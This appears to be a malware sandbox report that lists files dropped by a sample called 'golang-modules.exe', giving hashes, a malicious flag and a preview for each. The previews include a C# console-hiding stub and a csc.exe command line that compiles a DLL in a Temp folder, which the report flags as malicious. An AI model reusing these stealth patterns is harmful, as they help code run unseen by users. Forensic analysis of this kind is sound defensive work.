                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                  File Type:MSVC .res
                                  Category:dropped
                                  Size (bytes):652
                                  Entropy (8bit):3.094785798006607
                                  Encrypted:false
                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryHGak7YnqqyXPN5Dlq5J:+RI+ycuZhNYakS0PNnqX
                                  MD5:B8C550FBDF71DB2E9C8C654F2C1AB38E
                                  SHA1:CBD9E1D5D5212D465BF78B18B99E086C9F85726D
                                  SHA-256:019A111E8585B3D5706A1F84786B12210BBF6F395DEF54D602EF982AC9F3EB7B
                                  SHA-512:CF1B883E7C18DE503FEDEC53B094837C1BF454171ABAAE33CC09D4FE5943D47E4D9FC34EFB10C3A18A96804D899BD990CA9CC2FD9954AAC1B454DE5418FAA6ED
                                  Malicious:false
                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...o.a.u.i.x.w.y.t...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...o.a.u.i.x.w.y.t...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                  Category:dropped
                                  Size (bytes):311
                                  Entropy (8bit):4.812290435151343
                                  Encrypted:false
                                  SSDEEP:6:V/DsYLDS81zu+VMOhMLL+iNFs2SRaiWhM/siNFs2SRkoSoODxLhy:V/DTLDfugMaWYI9Ox1y
                                  MD5:7BC8DE6AC8041186ED68C07205656943
                                  SHA1:673F31957AB1B6AD3DC769E86AEDC7ED4B4E0A75
                                  SHA-256:36865E3BCA9857E07B1137ADA07318B9CAAEF9608256A6A6A7FD426EE03E1697
                                  SHA-512:0495839C79597E81D447672F8E85B03D0401F81C7B2011A830874C33812C54DAB25B0F89A202BBB71ABB4FFC7CB2C07CC37C008B132D4D5D796AEBDD12741DBA
                                  Malicious:false
                                  Preview:.using System;.using System.Runtime.InteropServices;..namespace Console.{. public class Window. {. . [DllImport("Kernel32.dll")]. public static extern IntPtr GetConsoleWindow();. [DllImport("user32.dll")]. public static extern bool ShowWindow(IntPtr hWnd, Int32 nCmdShow);. .. }..}.
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                  Category:dropped
                                  Size (bytes):371
                                  Entropy (8bit):5.213272985013759
                                  Encrypted:false
                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2CN23f9lszxs7+AEszICN23f9lb9:p37Lvkmb6Km1lsWZE71lJ
                                  MD5:C42269C3B2B6DDF91E266B35C5D52C26
                                  SHA1:99924297BC2AB5C39133CC2E8560A37653AF0D9A
                                  SHA-256:4B7136F52FB9B4A67ACBD44306F07A7428D6BDFB80B6D1D1E631F75A9DC9BBAF
                                  SHA-512:7D00118CDFC50341FF743CC5A55A5CBDC24E7CA4EF8D04D1FEFCC6BEF5742DD21748B7A7D6A9CA2281719A4D6AC1EE65AE5D2F025923D9AEE24B2E6CFAB96F3F
                                  Malicious:true
                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\oauixwyt\oauixwyt.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\oauixwyt\oauixwyt.0.cs"
                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):3072
                                  Entropy (8bit):2.838058231064225
                                  Encrypted:false
                                  SSDEEP:24:etGS6EpeYYqql78G7v/0ZetkZfw9oRFWI+ycuZhNYakS0PNnq:66bYSlIqvMZRJw9oK1ulYa3Uq
                                  MD5:DACD413215DF59E3896C68FEDD79ADD4
                                  SHA1:2228395491A46CE57643BA09E7B5FE0915B61665
                                  SHA-256:FFA9A714BD8B5C73AAEB1AEEFD7EC2AA611D14FB2D35E6A23DB7B363076C95BC
                                  SHA-512:4F42632CDED8249932126132B46E607ED7FFE9052C580AA86C266D7C2459C333C6767FE6129097A7CF05158232B1EE162827F9483CECF3894349512401470A5B
                                  Malicious:false
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....|.f...........!.................#... ...@....... ....................................@.................................d#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~...... ...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................6./.....m.....m.......................................... =............ N.....P ......Y........._.....d...Y.....Y...!.Y.....Y.......".....+.........=.......N.......................................&........<Module
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (451), with CRLF, CR line terminators
                                  Category:modified
                                  Size (bytes):872
                                  Entropy (8bit):5.300383388955628
                                  Encrypted:false
                                  SSDEEP:24:KSId3ka6Km1ldE71lMKax5DqBVKVrdFAMBJTH:dkka6P1jE71+K2DcVKdBJj
                                  MD5:83E43F7F351C0C8FFA84A62BB9FCA28E
                                  SHA1:D11FC23EB5BEF66E228E89EEDDA696022804FED4
                                  SHA-256:68F24C02C9AC549BFD482AFCDC083CA6B38A2D00503BED52796B2FBC1ED2C651
                                  SHA-512:9F41D90DF7F7613B1D785822BC877B8E27BE155D231C66625220C74D91D4875946F392442A5CC04A0C8E6C21949D45C3790CD7D7715BE3CA0BFFD21B5296588F
                                  Malicious:false
                                  Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\oauixwyt\oauixwyt.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\oauixwyt\oauixwyt.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:C++ source, ASCII text
                                  Category:dropped
                                  Size (bytes):29401
                                  Entropy (8bit):4.878647788340572
                                  Encrypted:false
                                  SSDEEP:384:SPNAIMZaIcbU7Z8OIP5SF0IEz/Rc+rniYcCWOJ5ssSmM5OX6rb/4Q6f6qb5aM5vE:YvIgpcgQ6fG
                                  MD5:F4E74D3038BECB8B3093EED0192B7A27
                                  SHA1:66A845CBA7C2C478879238CC79F21DF40DD4575E
                                  SHA-256:2FE8C826256CB1B96E26C74AEAB465A329A307E7E1107BA296D059A07CC0F948
                                  SHA-512:0B3DBEC5D4A098FC551F8516CE87EB4DA292063A2F0C61D7279BC207E33D0D83A2DF9DB04EDCF58B6A0CF0914BA5B51C0E4CA38A17553DDE464B2C37BF7E38DE
                                  Malicious:false
                                  Preview:#include <cstring>.#include <napi.h>.#include <uv.h>..#include "macros.h".#include "database.h".#include "statement.h"..using namespace node_sqlite3;..Napi::Object Statement::Init(Napi::Env env, Napi::Object exports) {. Napi::HandleScope scope(env);.. // declare napi_default_method here as it is only available in Node v14.12.0+. auto napi_default_method = static_cast<napi_property_attributes>(napi_writable | napi_configurable);.. auto t = DefineClass(env, "Statement", {. InstanceMethod("bind", &Statement::Bind, napi_default_method),. InstanceMethod("get", &Statement::Get, napi_default_method),. InstanceMethod("run", &Statement::Run, napi_default_method),. InstanceMethod("all", &Statement::All, napi_default_method),. InstanceMethod("each", &Statement::Each, napi_default_method),. InstanceMethod("reset", &Statement::Reset, napi_default_method),. InstanceMethod("finalize", &Statement::Finalize_, napi_default_method),. });.. exports.Set(
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:C source, ASCII text
                                  Category:dropped
                                  Size (bytes):22230
                                  Entropy (8bit):5.0522303712030086
                                  Encrypted:false
                                  SSDEEP:192:JPjStDPG2moQpNrkJTdapteqh/1UpTvo2CqsaSjypFXu6WfqAG3n4lZ+53cY/5pu:JPj2Gxgav1qs1bqY
                                  MD5:D6F67F29966B29034FA0058D59A51794
                                  SHA1:E1F9F8C20B654568E65036D2928EA5DD6E3BBA6B
                                  SHA-256:40EA909433A35A95A8463C49231DDCA040717681FC96EE3BA6F10840429B4AD6
                                  SHA-512:7BEF1762CD869375B589DAC5E780406BAF7B477F14713540940CA177247943642F61C4B2084A08C808EA4F007EDE4BBC1BCF2F19425CB826EFB8B101BE445ED9
                                  Malicious:false
                                  Preview:#include <cstring>.#include <napi.h>..#include "macros.h".#include "database.h".#include "statement.h"..using namespace node_sqlite3;..#if NAPI_VERSION < 6.Napi::FunctionReference Database::constructor;.#endif..Napi::Object Database::Init(Napi::Env env, Napi::Object exports) {. Napi::HandleScope scope(env);. // declare napi_default_method here as it is only available in Node v14.12.0+. auto napi_default_method = static_cast<napi_property_attributes>(napi_writable | napi_configurable); .. auto t = DefineClass(env, "Database", {. InstanceMethod("close", &Database::Close, napi_default_method),. InstanceMethod("exec", &Database::Exec, napi_default_method),. InstanceMethod("wait", &Database::Wait, napi_default_method),. InstanceMethod("loadExtension", &Database::LoadExtension, napi_default_method),. InstanceMethod("serialize", &Database::Serialize, napi_default_method),. InstanceMethod("parallelize", &Database::Parallelize, napi_default_
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):1322
                                  Entropy (8bit):4.269649469997749
                                  Encrypted:false
                                  SSDEEP:24:4FzFrBZ5w7rKBFrI/3+N1+QmU2fFqySKEFI/3EBm0ZJb/0+QmU2fFqyae:4FzF1ZSrKBy/m1+zU2MySKEy/EQgq+zx
                                  MD5:0AD55AE01864DF3767D7B61678BD326E
                                  SHA1:FFEDCC19095FD54F8619F00F55074F275CEDDFD6
                                  SHA-256:4D65F2899FB54955218F28EC358A2CAD2C2074A7B43F862933C6A35E69AE0632
                                  SHA-512:AAEE895D110D67E87ED1E8ED6557B060A0575F466A947A4F59CC9D111381E1AF6AA54D432233716C78F146168D548A726FED1EAB2B3F09BB71E0AE7F4FDC69E3
                                  Malicious:false
                                  Preview:{. 'variables': {. 'sqlite_version%':'3440200',. "toolset%":'',. },. 'target_defaults': {. 'default_configuration': 'Release',. 'conditions': [. [ 'toolset!=""', {. 'msbuild_toolset':'<(toolset)'. }]. ],. 'configurations': {. 'Debug': {. 'defines!': [. 'NDEBUG'. ],. 'cflags_cc!': [. '-O3',. '-Os',. '-DNDEBUG'. ],. 'xcode_settings': {. 'OTHER_CPLUSPLUSFLAGS!': [. '-O3',. '-Os',. '-DDEBUG'. ],. 'GCC_OPTIMIZATION_LEVEL': '0',. 'GCC_GENERATE_DEBUGGING_SYMBOLS': 'YES'. },. 'msvs_settings': {. 'VCCLCompilerTool': {. 'ExceptionHandling': 1, # /EHsc. }. }. },. 'Release': {. 'defines': [. 'NDEBUG'. ],. 'xcode_settings': {. 'OTHER_CPLUSPLUSFLAGS!': [. '-Os',. '-O2'. ],. 'GCC_
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:C++ source, ASCII text
                                  Category:dropped
                                  Size (bytes):6882
                                  Entropy (8bit):4.879154935574395
                                  Encrypted:false
                                  SSDEEP:192:jXmQS7rRLcxPsPVHXmIXYIyx15kPhw0Io:j2QS7rRLOPs5e0
                                  MD5:29DD2FCA11A4E0776C49140ECAC95CE9
                                  SHA1:837CFBC391C7FAAD304E745FC48AE9693AFAF433
                                  SHA-256:556BA9AF78010F41BC6B5B806743DC728BC181934BF8A7C6E5D606F9B8C7A2E9
                                  SHA-512:5785667B9C49D4F4320022C98E0567A412B48A790C99569261C12B8738BDE0B4949D3998E2B375540EDE2FF1D861CAD859780ADE796B71D4D1D692E1ED449021
                                  Malicious:false
                                  Preview:#ifndef NODE_SQLITE3_SRC_BACKUP_H.#define NODE_SQLITE3_SRC_BACKUP_H..#include "database.h"..#include <string>.#include <queue>.#include <set>..#include <sqlite3.h>.#include <napi.h>..using namespace Napi;..namespace node_sqlite3 {../**. *. * A class for managing an sqlite3_backup object. For consistency. * with other node-sqlite3 classes, it maintains an internal queue. * of calls.. *. * Intended usage from node:. *. * var db = new sqlite3.Database('live.db');. * var backup = db.backup('backup.db');. * .... * // in event loop, move backup forward when we have time.. * if (backup.idle) { backup.step(NPAGES); }. * if (backup.completed) { ... success ... }. * if (backup.failed) { ... sadness ... }. * // do other work in event loop - fine to modify live.db. * .... *. * Here is how sqlite's backup api is exposed:. *. * - `sqlite3_backup_init`: This is implemented as. * `db.backup(filename, [callback])` or. * `db.backup(filename, destDbName, sourceDbName, file
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:JSON data
                                  Category:dropped
                                  Size (bytes):2189
                                  Entropy (8bit):4.910536087911446
                                  Encrypted:false
                                  SSDEEP:48:atuR+HnA7Ydf7aKCRU0dmGiW/o2Ygy3rj/cirPRpg0q:RsHnpjXixY2o2Fy3rj//rPRp0
                                  MD5:D0D759C39758174ECA4580E6A04A2C15
                                  SHA1:97366BB2FA9D63BB9660B3D130EFB6D37A6B80EF
                                  SHA-256:C782C19485B0026E209076A236484A62885CB3A0828322A2936043230ED1EC41
                                  SHA-512:B1F728883023D93EA46E72278A4DFF96BF6489E37471F8804BD7D6C52F21B7EE284803CEC589C941701A590458671F7C53D63F0F75500843EE25D8D4E60629D0
                                  Malicious:false
                                  Preview:{. "name": "sqlite3",. "description": "Asynchronous, non-blocking SQLite3 bindings",. "version": "5.1.7",. "homepage": "https://github.com/TryGhost/node-sqlite3",. "author": {. "name": "Mapbox",. "url": "https://mapbox.com/". },. "binary": {. "napi_versions": [. 3,. 6. ]. },. "contributors": [. "Daniel Lockyer <hi@daniellockyer.com>",. "Konstantin K.fer <mail@kkaefer.com>",. "Dane Springmeyer <dane@mapbox.com>",. "Will White <will@mapbox.com>",. "Orlando Vazquez <ovazquez@gmail.com>",. "Artem Kustikov <kustikoff@gmail.com>",. "Eric Fredricksen <efredricksen@gmail.com>",. "John Wright <mrjjwright@gmail.com>",. "Ryan Dahl <ry@tinyclouds.org>",. "Tom MacWright <tom@mapbox.com>",. "Carter Thaxton <carter.thaxton@gmail.com>",. "Audrius Ka.ukauskas <audrius@neutrino.lt>",. "Johannes Schauer <josch@pyneo.org>",. "Nathan Rajlich <nathan@tootallnate.net>",. "AJ ONeal <coolaj86@gmail.com>",. "Mithgol",. "Ben Noor
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):224
                                  Entropy (8bit):4.702985304607579
                                  Encrypted:false
                                  SSDEEP:3:5XFbUlycyp1wNQXkIY+lGAWMbVLWINHVY+lGAWM9wvyxXvn+LMOfr+HIdUyfFahX:5E360iGzMFNVPGzM+Ev+4OTdUyfF1w
                                  MD5:F0A82A6A6043BF87899114337C67DF6C
                                  SHA1:A906C146EB0A359742FF85C1D96A095BD0DD95FD
                                  SHA-256:5BE353D29C0FABEA29CFD34448C196DA9506009C0B20FDE55E01D4191941DD74
                                  SHA-512:D26879F890226808D9BD2644C5CA85CC339760E86B330212505706E5749464FAFAD1CB5F018C59A8F034D68D327CD3FA5234CEAC0677DE1AC9AE09039F574240
                                  Malicious:false
                                  Preview:const tar = require("tar");.const path = require("path");.const tarball = path.resolve(process.argv[2]);.const dirname = path.resolve(process.argv[3]);..tar.extract({. sync: true,. file: tarball,. cwd: dirname,.});.
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:C++ source, ASCII text
                                  Category:dropped
                                  Size (bytes):6781
                                  Entropy (8bit):4.730525251915133
                                  Encrypted:false
                                  SSDEEP:192:T2kHmSF3oPvmPVD6LjmbaXCYG4hqY21nyi6BF1pcDoF/+InO:1Gw4PvmlQjRNL21+BSDt
                                  MD5:0B81C9BE1DC0FF314182399CDC301AEA
                                  SHA1:7433B86711D132A4DF826BAE80E58801A3EB74C9
                                  SHA-256:605633BA0FB1922C16AA5FBFFFED52A097F29BF31CEE7190D810C24C02DE515B
                                  SHA-512:9CF986538D048A48B9F020FC51F994F25168540DB35BDB0314744FDEC80A45BA99064BC35FE76B35918753C2886D4466FDD7E36B25838C6039F712E5AC7D81B3
                                  Malicious:false
                                  Preview:#ifndef NODE_SQLITE3_SRC_STATEMENT_H.#define NODE_SQLITE3_SRC_STATEMENT_H..#include <cstdlib>.#include <cstring>.#include <string>.#include <queue>.#include <vector>.#include <sqlite3.h>.#include <napi.h>.#include <uv.h>..#include "database.h".#include "threading.h"..using namespace Napi;..namespace node_sqlite3 {..namespace Values {. struct Field {. inline Field(unsigned short _index, unsigned short _type = SQLITE_NULL) :. type(_type), index(_index) {}. inline Field(const char* _name, unsigned short _type = SQLITE_NULL) :. type(_type), index(0), name(_name) {}.. unsigned short type;. unsigned short index;. std::string name;.. virtual ~Field() = default;. };.. struct Integer : Field {. template <class T> inline Integer(T _name, int64_t val) :. Field(_name, SQLITE_INTEGER), value(val) {}. int64_t value;. virtual ~Integer() override = default;. };.. struct Float : Field {.
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):59
                                  Entropy (8bit):4.439231872095227
                                  Encrypted:false
                                  SSDEEP:3:3BBBbJvHEb9UJMRzL+BMev:xBBdHWDRnA
                                  MD5:8582B2DCAED9C5A6F3B7CFE150545254
                                  SHA1:14667874E0BFBE4FFC951F3E4BEC7C5CF44E5A81
                                  SHA-256:762C7A74D7F92860A3873487B68E89F654A21D2AAEAE9524EAB5DE9C65E66A9C
                                  SHA-512:22EC4DF7697322B23AE2E73C692ED5C925D50FDE2B7E72BFC2D5DD873E2DA51834B920DEA7C67CCA5733E8A3F5E603805762E8BE238C651AA40290452843411D
                                  Malicious:false
                                  Preview:module.exports = require('bindings')('node_sqlite3.node');.
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):1725
                                  Entropy (8bit):4.570601989842644
                                  Encrypted:false
                                  SSDEEP:48:XnbrxZ0k0mlxe3wmTXya45ZjSjjYddQndGE6ZmdF0BW:Lrwfj3lTXya+jSjjYdqdv28
                                  MD5:B18910876AFA5BE79DC709E0B314108E
                                  SHA1:FBD12AA3A25EAA0EA9883C49282029BBB9A9B1AD
                                  SHA-256:82C0FFFCCC54EF10231BE8C7E190FEB8FEEA44EFC01B4ECFE12E4D8A0ECFB20D
                                  SHA-512:20A8EF66EC345D0F90416ACF2A288D22C3F7B44B1E1A747C5AD4C9196CBBD6CA51683650D90AFEA97F33F847C8FD5D8FD9221CE7E0A7F4494E58288F8D80BAB7
                                  Malicious:false
                                  Preview:{. "includes": [ "deps/common-sqlite.gypi" ],. "variables": {. "sqlite%":"internal",. "sqlite_libname%":"sqlite3",. "module_name": "node_sqlite3",. },. "targets": [. {. "target_name": "<(module_name)",. "cflags!": [ "-fno-exceptions" ],. "cflags_cc!": [ "-fno-exceptions" ],. "xcode_settings": { "GCC_ENABLE_CPP_EXCEPTIONS": "YES",. "CLANG_CXX_LIBRARY": "libc++",. "MACOSX_DEPLOYMENT_TARGET": "10.7",. },. "msvs_settings": {. "VCCLCompilerTool": { "ExceptionHandling": 1 },. },. "include_dirs": [. "<!@(node -p \"require('node-addon-api').include\")"],. "conditions": [. ["sqlite != 'internal'", {. "include_dirs": [. "<!@(node -p \"require('node-addon-api').include\")", "<(sqlite)/include" ],. "libraries": [. "-l<(sqlite_libname)". ],. "conditions": [. [ "OS=='linux'", {"libraries+":["-Wl,-rpath=<@(sqlite)/lib
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:C++ source, ASCII text
                                  Category:dropped
                                  Size (bytes):5152
                                  Entropy (8bit):4.827269492024068
                                  Encrypted:false
                                  SSDEEP:96:HWEP0L0TnYvyVH0GmPnsM8plenrnxiNn5hVB4KTRDpLzysrPrWr7xaqan4qi7lgj:vPivyVHfmPjrcN5h/4KVVr43lUZtX
                                  MD5:DE31AB62B7068AEA6CFFB22B54A435BB
                                  SHA1:7FD98864C970CAA9C60CFC4CE1E77D736B5B5231
                                  SHA-256:8521F458B206ED8F9BF79E2BD869DA0A35054B4BE44D6EA8C371DB207ECCB283
                                  SHA-512:598491103564B024012DA39AC31F54CF39F10DA789CD5B17AF44E93042D9526B9FFD4867112C5F9755CB4ADA398BF5429F01DDA6C1BBC5137BEA545C3C88453B
                                  Malicious:false
                                  Preview:.#ifndef NODE_SQLITE3_SRC_DATABASE_H.#define NODE_SQLITE3_SRC_DATABASE_H...#include <assert.h>.#include <string>.#include <queue>..#include <sqlite3.h>.#include <napi.h>..#include "async.h"..using namespace Napi;..namespace node_sqlite3 {..class Database;...class Database : public Napi::ObjectWrap<Database> {.public:.#if NAPI_VERSION < 6. static Napi::FunctionReference constructor;.#endif. static Napi::Object Init(Napi::Env env, Napi::Object exports);.. static inline bool HasInstance(Napi::Value val) {. auto env = val.Env();. Napi::HandleScope scope(env);. if (!val.IsObject()) return false;. auto obj = val.As<Napi::Object>();.#if NAPI_VERSION < 6. return obj.InstanceOf(constructor.Value());.#else. auto constructor =. env.GetInstanceData<Napi::FunctionReference>();. return obj.InstanceOf(constructor->Value());.#endif. }.. struct Baton {. napi_async_work request = NULL;. Database* db;. Napi::F
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):3021
                                  Entropy (8bit):4.679912791477012
                                  Encrypted:false
